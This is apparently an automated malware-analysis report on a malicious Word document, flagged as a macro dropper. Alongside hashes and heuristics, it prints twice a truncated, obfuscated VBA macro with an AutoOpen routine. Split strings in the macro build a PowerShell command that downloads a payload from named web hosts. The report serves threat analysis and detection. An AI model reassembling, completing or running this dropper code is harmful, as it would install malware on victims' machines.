Office (OLE) malware analysis — malicious · b859eab6113acdde

MALICIOUS

Office (OLE)

99.5 KB Created: 2018-02-12 11:55:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 9657a0f6cf298b92d8c202ebfe73d399 SHA-1: 8c47566287105d1ba9d99121a0ad23125ea6b2f0 SHA-256: b859eab6113acddebd201be486120caf32d3074225c0472dfe7ae633151eac27

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of execution, suggesting it's designed to download and execute a secondary payload. The ClamAV detection and heuristic firings further confirm its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6446844-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6446844-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25465 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	25465 bytes
SHA-256: `3407e89f609ce959fe3b162a3129fdc6de83d82a457dcd418327dafe711bc7ed`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "cSQXFDIjlpFH" Sub AutoOpen() On Error Resume Next LqfiwSsNl = FQinzaqvSw - Sgn(BZKPLYdhdI) - (5142386 - Tan(511616) / 3120319 - ChrW(jwWzjXjiUYzri)) uKUuRcLJQ = OltPfIW - Sgn(NStQiTwia) - (180464 - Tan(4465312) / 887243 - ChrW(PUujXINJZEk)) QbHOpIBVw = mYkdfAwiBKmMj - Sgn(QzjIAIUnNJADLh) - (8667348 - Tan(3569941) / 9939852 - ChrW(Gsd)) Application.Run "jwUTbAFdCUJb", MoMUljkF vKFrHPaXu = ErIwqcsVpYwLad - Sgn(pQpjKkFrV) - (3958623 - Tan(7878187) / 5123982 - ChrW(stuPSL)) wLCjCqGjQ = ikjcPSw - Sgn(ojNwAndBBbd) - (9372020 - Tan(5888098) / 6679374 - ChrW(PjQmhnsDEpXqk)) FwBZuJbjw = LPFApiDTowrTvz - Sgn(QwvfJIcwtv) - (656141 - Tan(5159000) / 681277 - ChrW(VHJ)) End Sub Function MoMUljkF() On Error Resume Next JOFGwwDpajO = RNAELqMLFw - Sgn(iPqQjzOD) - (6902267 - Tan(7638780) / 1658486 - ChrW(PwAXuAfwH)) ZwIHq = CiTMlz - Sgn(NuO) - (1867285 - Tan(7596356) / 6984063 - ChrW(WWmDGONu)) XmooqwBfnO = klHL - Sgn(SLZzQNM) - (2314121 - Tan(9445219) / 4371566 - ChrW(RCWstT)) bkzDcdfbjPo = kwhNqIraG + Mid(GLOoNnV + "VCEBBVZzEP'+'R+GP'+'Rx6env:GPR+GPRpGPR+GPRubl'+'ic + LGPR+GPShHdrzcDOAZfZXIYGfjj" + USz, 10, 51) ACSzaGCJ = BOQKvkSuzzFW - Sgn(DpNvj) - (6002601 - Tan(3916537) / 5290380 - ChrW(EHEpN)) vESiJSrczwJ = wwlDhMHHTRiB - Sgn(AmrGAN) - (1839074 - Tan(4018767) / 2223523 - ChrW(GJrPrJI)) wPlThChtLW = GWbv - Sgn(MBpwwhuiBdEaXN) - (316046 - Tan(675563) / 5292289 - ChrW(Vni)) YoswlJBnL = MaAYNbstDIW + Mid(bdmiujoLXXN + "NGPR+GPRM/?h'+'rw8+rw8mMGNTCEPSvnj" + ZPqoL, 2, 21) UWspuvlMAaU = jHzwjjk - Sgn(awQVkiz) - (8505603 - Tan(2012184) / 8194527 - ChrW(WoaOCJvCDI)) aTFdopIzDw = MhzSwwLShDjWih - Sgn(SkMJKUcY) - (7207712 - Tan(6162517) / 1221293 - ChrW(zplhjKdmiYRkA)) SSjRPFHz = sJfpSwjfqL - Sgn(twbjJLmrDOcw) - (4141070 - Tan(16807) / 2231252 - ChrW(uou)) DAdSIfj = upzPwKLbioF + Mid(iELRNmQpEfno + "EOjbFnpHdUWBimie/r3AGPR+G'+'PRDutEfovSjUN" + vGCfSGH, 16, 16) EddhDRU = wRPNJpGvlrvsN - Sgn(VzRPQYhrwiV) - (5660553 - Tan(2553032) / 9927181 - ChrW(sOiniNLNFjGGOa)) lBuVihvA = DhiCqClJv - Sgn(LFVk) - (8381841 - Tan(6199860) / 5460240 - ChrW(ztcN)) dfHIiNkO = fXJm - Sgn(jKSSQ) - (4334652 - Tan(5231822) / 7756884 - ChrW(KIvHEmjWHqcNDd)) JzZhoh = bJdcStvNK + Mid(Rwasm + "JIHGPRpolder'+'.nl/EAGPR+GPRQ6Y/?htGPR+GPRtps://spGPR+GPRor'+'tshuGPR+GPRb.oGPR+GPRutGPR+GPRcome.lirw8+rw8fvPoiznnjnizOSQWhFhQHK" + CCZMf, 4, 104) ahAtBzwaLzw = jYl - Sgn(zfbfi) - (5296945 - Tan(157773) / 8542620 - ChrW(TsSKVMAQu)) FlMVpjzIPjL = PDqPOGZz - Sgn(VrEZ) - (4701297 - Tan(8339950) / 6451384 - ChrW(XVDwZjiwaro)) kwCPOsCizAi = USlp - Sgn(VHIPMZIbvXmOSu) - (3624860 - Tan(7772841) / 4967057 - ChrW(urdpXMTnP)) YZcifz = RjzpczfhQYdlos + Mid(wJDhRwBmXaYI + "TRfBi'+'x'+'FLfB + GPR+GPROxGPxCL+xCLR+Grw'+'8+rw8PR6GPR+GPRNSB + GPxCL+xCLR'+'miKAXuCvwJtnVjrtGC" + SJwdjS, 2, 78) ScDJE = Tjzsr - Sgn(PDRzwILOUmf) - (3396992 - Tan(2975874) / 4931414 - ChrW(NOREWzcammXl)) CIVkG = pLiQFmD - Sgn(XtBNUUcJssHJ) - (3902557 - Tan(1134567) / 3536743 - ChrW(nVjnciLZWr)) JOUNjqsu = JEPLdWwq - Sgn(QqBizQu) - (8902152 - Tan(2980998) / 5445724 - ChrW(jsAckCPOsicqcv)) vWNjNWVWn = skDFPaCjYWLw + Mid(UiJshIzVSuprz + "MYkjuHGzUk -cREZSWVfi" + jjwwYKXj, 11, 5) bXHHX = QNkpi - Sgn(vjfRzbC) - (1510777 - Tan(3377304) / 3599844 - ChrW(jECBrFEfkRKczt)) XLMVOP = HAUDYFOW - Sgn(UGJcfiq) - (4078435 - Tan(4155847) / 627953 - ChrW(idJYIjJtCkHi)) DbLMBL = bTBnOtrV - Sgn(hhlwbACbpG) - (8804902 - Tan(838164) / 8224757 - ChrW(qvusvVUkNX)) hiTsWUutKC = FdjimVPzQ + Mid(TFoMkQJusqQDma + "BwWGiwmHOSPR,[rw8+rw8STRINgxCL+xCL][cHAxCL+xCLR]34).repLACe('+'([cHAR]79+[rw8+rw8cHrw8+rw8AR]120+[cHAR]54'+'),GPR1xCL+xCLs5GPR).'+'repLACe(GPRLfBGPR,[STRINgxCL+xCL][rw8+rw8cHAR'+'HCiHDNhvsORlbjjzCRzELjGfQzdDZ" + GkzmozZjj, 11, 169) InKopmnznG = LrTBvzNzUNKa - Sgn(WYifiktjOIjo) - (7407636 - Tan(5952910 ... (truncated)

SHA-256: 3407e89f609ce959fe3b162a3129fdc6de83d82a457dcd418327dafe711bc7ed

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cSQXFDIjlpFH"
Sub AutoOpen()
On Error Resume Next
LqfiwSsNl = FQinzaqvSw - Sgn(BZKPLYdhdI) - (5142386 - Tan(511616) / 3120319 - ChrW(jwWzjXjiUYzri))
uKUuRcLJQ = OltPfIW - Sgn(NStQiTwia) - (180464 - Tan(4465312) / 887243 - ChrW(PUujXINJZEk))
QbHOpIBVw = mYkdfAwiBKmMj - Sgn(QzjIAIUnNJADLh) - (8667348 - Tan(3569941) / 9939852 - ChrW(Gsd))
Application.Run "jwUTbAFdCUJb", MoMUljkF
vKFrHPaXu = ErIwqcsVpYwLad - Sgn(pQpjKkFrV) - (3958623 - Tan(7878187) / 5123982 - ChrW(stuPSL))
wLCjCqGjQ = ikjcPSw - Sgn(ojNwAndBBbd) - (9372020 - Tan(5888098) / 6679374 - ChrW(PjQmhnsDEpXqk))
FwBZuJbjw = LPFApiDTowrTvz - Sgn(QwvfJIcwtv) - (656141 - Tan(5159000) / 681277 - ChrW(VHJ))
End Sub
Function MoMUljkF()
On Error Resume Next
JOFGwwDpajO = RNAELqMLFw - Sgn(iPqQjzOD) - (6902267 - Tan(7638780) / 1658486 - ChrW(PwAXuAfwH))
ZwIHq = CiTMlz - Sgn(NuO) - (1867285 - Tan(7596356) / 6984063 - ChrW(WWmDGONu))
XmooqwBfnO = klHL - Sgn(SLZzQNM) - (2314121 - Tan(9445219) / 4371566 - ChrW(RCWstT))
bkzDcdfbjPo = kwhNqIraG + Mid(GLOoNnV + "VCEBBVZzEP'+'R+GP'+'Rx6env:GPR+GPRpGPR+GPRubl'+'ic + LGPR+GPShHdrzcDOAZfZXIYGfjj" + USz, 10, 51)
ACSzaGCJ = BOQKvkSuzzFW - Sgn(DpNvj) - (6002601 - Tan(3916537) / 5290380 - ChrW(EHEpN))
vESiJSrczwJ = wwlDhMHHTRiB - Sgn(AmrGAN) - (1839074 - Tan(4018767) / 2223523 - ChrW(GJrPrJI))
wPlThChtLW = GWbv - Sgn(MBpwwhuiBdEaXN) - (316046 - Tan(675563) / 5292289 - ChrW(Vni))
YoswlJBnL = MaAYNbstDIW + Mid(bdmiujoLXXN + "NGPR+GPRM/?h'+'rw8+rw8mMGNTCEPSvnj" + ZPqoL, 2, 21)
UWspuvlMAaU = jHzwjjk - Sgn(awQVkiz) - (8505603 - Tan(2012184) / 8194527 - ChrW(WoaOCJvCDI))
aTFdopIzDw = MhzSwwLShDjWih - Sgn(SkMJKUcY) - (7207712 - Tan(6162517) / 1221293 - ChrW(zplhjKdmiYRkA))
SSjRPFHz = sJfpSwjfqL - Sgn(twbjJLmrDOcw) - (4141070 - Tan(16807) / 2231252 - ChrW(uou))
DAdSIfj = upzPwKLbioF + Mid(iELRNmQpEfno + "EOjbFnpHdUWBimie/r3AGPR+G'+'PRDutEfovSjUN" + vGCfSGH, 16, 16)
EddhDRU = wRPNJpGvlrvsN - Sgn(VzRPQYhrwiV) - (5660553 - Tan(2553032) / 9927181 - ChrW(sOiniNLNFjGGOa))
lBuVihvA = DhiCqClJv - Sgn(LFVk) - (8381841 - Tan(6199860) / 5460240 - ChrW(ztcN))
dfHIiNkO = fXJm - Sgn(jKSSQ) - (4334652 - Tan(5231822) / 7756884 - ChrW(KIvHEmjWHqcNDd))
JzZhoh = bJdcStvNK + Mid(Rwasm + "JIHGPRpolder'+'.nl/EAGPR+GPRQ6Y/?htGPR+GPRtps://spGPR+GPRor'+'tshuGPR+GPRb.oGPR+GPRutGPR+GPRcome.lirw8+rw8fvPoiznnjnizOSQWhFhQHK" + CCZMf, 4, 104)
ahAtBzwaLzw = jYl - Sgn(zfbfi) - (5296945 - Tan(157773) / 8542620 - ChrW(TsSKVMAQu))
FlMVpjzIPjL = PDqPOGZz - Sgn(VrEZ) - (4701297 - Tan(8339950) / 6451384 - ChrW(XVDwZjiwaro))
kwCPOsCizAi = USlp - Sgn(VHIPMZIbvXmOSu) - (3624860 - Tan(7772841) / 4967057 - ChrW(urdpXMTnP))
YZcifz = RjzpczfhQYdlos + Mid(wJDhRwBmXaYI + "TRfBi'+'x'+'FLfB + GPR+GPROxGPxCL+xCLR+Grw'+'8+rw8PR6GPR+GPRNSB + GPxCL+xCLR'+'miKAXuCvwJtnVjrtGC" + SJwdjS, 2, 78)
ScDJE = Tjzsr - Sgn(PDRzwILOUmf) - (3396992 - Tan(2975874) / 4931414 - ChrW(NOREWzcammXl))
CIVkG = pLiQFmD - Sgn(XtBNUUcJssHJ) - (3902557 - Tan(1134567) / 3536743 - ChrW(nVjnciLZWr))
JOUNjqsu = JEPLdWwq - Sgn(QqBizQu) - (8902152 - Tan(2980998) / 5445724 - ChrW(jsAckCPOsicqcv))
vWNjNWVWn = skDFPaCjYWLw + Mid(UiJshIzVSuprz + "MYkjuHGzUk -cREZSWVfi" + jjwwYKXj, 11, 5)
bXHHX = QNkpi - Sgn(vjfRzbC) - (1510777 - Tan(3377304) / 3599844 - ChrW(jECBrFEfkRKczt))
XLMVOP = HAUDYFOW - Sgn(UGJcfiq) - (4078435 - Tan(4155847) / 627953 - ChrW(idJYIjJtCkHi))
DbLMBL = bTBnOtrV - Sgn(hhlwbACbpG) - (8804902 - Tan(838164) / 8224757 - ChrW(qvusvVUkNX))
hiTsWUutKC = FdjimVPzQ + Mid(TFoMkQJusqQDma + "BwWGiwmHOSPR,[rw8+rw8STRINgxCL+xCL][cHAxCL+xCLR]34).repLACe('+'([cHAR]79+[rw8+rw8cHrw8+rw8AR]120+[cHAR]54'+'),GPR1xCL+xCLs5GPR).'+'repLACe(GPRLfBGPR,[STRINgxCL+xCL][rw8+rw8cHAR'+'HCiHDNhvsORlbjjzCRzELjGfQzdDZ" + GkzmozZjj, 11, 169)
InKopmnznG = LrTBvzNzUNKa - Sgn(WYifiktjOIjo) - (7407636 - Tan(5952910
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.